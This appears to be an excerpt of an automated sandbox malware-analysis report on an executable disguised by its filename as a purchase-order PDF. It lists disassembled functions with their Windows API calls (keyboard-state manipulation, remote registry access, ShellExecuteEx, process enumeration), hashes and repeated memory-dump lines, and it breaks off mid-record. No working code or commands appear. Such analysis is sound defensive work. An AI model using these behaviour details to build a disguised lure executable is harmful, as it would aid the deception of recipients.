                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3488606520-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                                                                                                                                                                                                            Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4082120231-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                            • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                                                                                                                                                                                            Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4082120231-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                                                                                                                                                                                                            Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 288456094-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                                                                                                                                                            • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                                                                                                                                                                                                            Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 004449B0
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                                                                                                                                                                                            • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                                                                                                                                                                                                            Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00444BA9
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                                                                                                                                                                                                            Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                                                                                                                                                                                            • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                                                                                                                                                                                                            Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                                                                                                                                                                                                            Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00457C34
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00457CE8
                                                                                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: <$@
                                                                                                                                                                                                                                                                                                            • API String ID: 1325244542-1426351568
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1419d59865651ecaf8be0f4e6134ca12af692b6050b2e895030b81c494408991
                                                                                                                                                                                                                                                                                                            • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1419d59865651ecaf8be0f4e6134ca12af692b6050b2e895030b81c494408991
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                                                                                                                                                                                                            Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 004737F6
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
